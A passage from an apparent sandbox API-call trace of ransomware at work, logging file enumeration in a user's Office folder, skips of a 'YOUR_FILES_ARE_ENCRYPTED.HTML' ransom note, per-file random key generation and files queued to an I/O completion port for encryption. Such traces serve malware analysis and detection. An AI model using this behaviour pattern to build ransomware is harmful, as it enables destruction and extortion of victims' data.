ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.486] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbc794980, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbc794980, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbc794980, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x139c4, dwReserved0=0x0, dwReserved1=0x60, cFileName="excel.exe_Rules.xml", cAlternateFileName="EXCELE~1.XML")) returned 1 [0159.487] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml") returned 79 [0159.487] lstrcmpW (lpString1="excel.exe_Rules.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.487] PathFindExtensionW (pszPath="excel.exe_Rules.xml") returned=".xml" [0159.487] lstrlenW (lpString=".xml") returned 4 [0159.487] PathFindExtensionW (pszPath="excel.exe_Rules.xml") returned=".xml" [0159.487] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.487] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\16.0\\excel.exe_rules.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0159.488] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=80324) returned 1 [0159.488] GetProcessHeap () returned 0x270000 [0159.488] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0159.493] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="65") returned 2 [0159.493] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="AE") returned 2 [0159.493] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="DC") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="BE") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="39") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="C7") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="8E") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="08") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="32") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="BF") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="72") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="0F") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="D7") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="52") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="15") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="E2") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="7D") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="23") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="97") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="B7") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="AA") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="74") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="53") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="50") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="08") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="62") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="19") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="B3") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="37") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="B1") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="5B") returned 2 [0159.495] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="02") returned 2 [0159.495] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml" [0159.495] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.495] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0159.496] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x34fad830, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x34fad830, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x34fad830, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x4050, dwReserved0=0x0, dwReserved1=0x60, cFileName="officec2rclient.exe_Rules.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0159.496] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml") returned 89 [0159.496] lstrcmpW (lpString1="officec2rclient.exe_Rules.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.496] PathFindExtensionW (pszPath="officec2rclient.exe_Rules.xml") returned=".xml" [0159.496] lstrlenW (lpString=".xml") returned 4 [0159.496] PathFindExtensionW (pszPath="officec2rclient.exe_Rules.xml") returned=".xml" [0159.496] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.498] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\16.0\\officec2rclient.exe_rules.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.498] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=16464) returned 1 [0159.501] GetProcessHeap () returned 0x270000 [0159.506] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0159.509] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="B5") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="62") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="F9") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="56") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="15") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="2C") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="E8") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="58") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="C9") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="41") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="E9") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="5C") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="CD") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="23") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="71") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="6D") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="E2") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="7D") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="69") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="0F") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="68") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="22") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="68") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="A7") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="CE") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="DA") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="95") returned 2 [0159.510] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="FD") returned 2 [0159.510] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="DF") returned 2 [0159.510] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="97") returned 2 [0159.510] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="1F") returned 2 [0159.510] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="0C") returned 2 [0159.510] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml" [0159.510] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.510] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0159.523] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a341890, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6a341890, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6a341890, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x14a97, dwReserved0=0x0, dwReserved1=0x60, cFileName="outlook.exe_Rules.xml", cAlternateFileName="OUTLOO~1.XML")) returned 1 [0159.523] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml") returned 81 [0159.524] lstrcmpW (lpString1="outlook.exe_Rules.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.524] PathFindExtensionW (pszPath="outlook.exe_Rules.xml") returned=".xml" [0159.524] lstrlenW (lpString=".xml") returned 4 [0159.524] PathFindExtensionW (pszPath="outlook.exe_Rules.xml") returned=".xml" [0159.524] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.524] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\16.0\\outlook.exe_rules.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.524] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=84631) returned 1 [0159.524] GetProcessHeap () returned 0x270000 [0159.524] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0159.525] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="2C") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="FC") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="DC") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="1C") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="71") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="24") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="2A") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="AE") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="37") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="6E") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="3C") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="0A") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="08") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="C3") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="11") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="AD") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="B3") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="96") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="5C") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="B7") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="40") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="8D") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="7A") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="6F") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="CD") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="7B") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="30") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="EE") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="74") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="ED") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="A4") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="7F") returned 2 [0159.526] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml" [0159.526] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.526] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0159.528] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3a82bc0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xe3a82bc0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xe3a82bc0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12c44, dwReserved0=0x0, dwReserved1=0x60, cFileName="powerpnt.exe_Rules.xml", cAlternateFileName="POWERP~1.XML")) returned 1 [0159.528] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml") returned 82 [0159.528] lstrcmpW (lpString1="powerpnt.exe_Rules.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.528] PathFindExtensionW (pszPath="powerpnt.exe_Rules.xml") returned=".xml" [0159.528] lstrlenW (lpString=".xml") returned 4 [0159.529] PathFindExtensionW (pszPath="powerpnt.exe_Rules.xml") returned=".xml" [0159.529] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\16.0\\powerpnt.exe_rules.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.542] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=76868) returned 1 [0159.542] GetProcessHeap () returned 0x270000 [0159.542] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0159.542] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="FC") returned 2 [0159.542] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="E8") returned 2 [0159.542] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="DE") returned 2 [0159.542] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="78") returned 2 [0159.542] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="5B") returned 2 [0159.542] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="81") returned 2 [0159.542] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="FF") returned 2 [0159.542] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="77") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="D7") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="E4") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="C4") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="24") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="C4") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="94") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="F4") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="B9") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="07") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="33") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="85") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="0F") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="61") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="FC") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="AD") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="92") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="A6") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="2B") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="64") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="F1") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="F6") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="B7") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="90") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="7A") returned 2 [0159.544] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml" [0159.544] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.544] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0159.544] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33b4bbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x33b4bbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x33b4bbd0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="WebServiceCache", cAlternateFileName="WEBSER~1")) returned 1 [0159.545] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache") returned 75 [0159.545] GetProcessHeap () returned 0x270000 [0159.545] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0159.545] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache" [0159.546] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\*" [0159.546] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33b4bbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x33b4bbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x33b4bbd0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1e12a7c, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0159.546] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33b4bbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x33b4bbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x33b4bbd0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1e12a7c, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.546] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33b4bbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x33b4bbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x33b4bbd0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1e12a7c, dwReserved1=0x0, cFileName="AllUsers", cAlternateFileName="")) returned 1 [0159.546] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers") returned 84 [0159.546] GetProcessHeap () returned 0x270000 [0159.546] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7422068 [0159.551] lstrcpyW (in: lpString1=0x7422068, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers" | out: 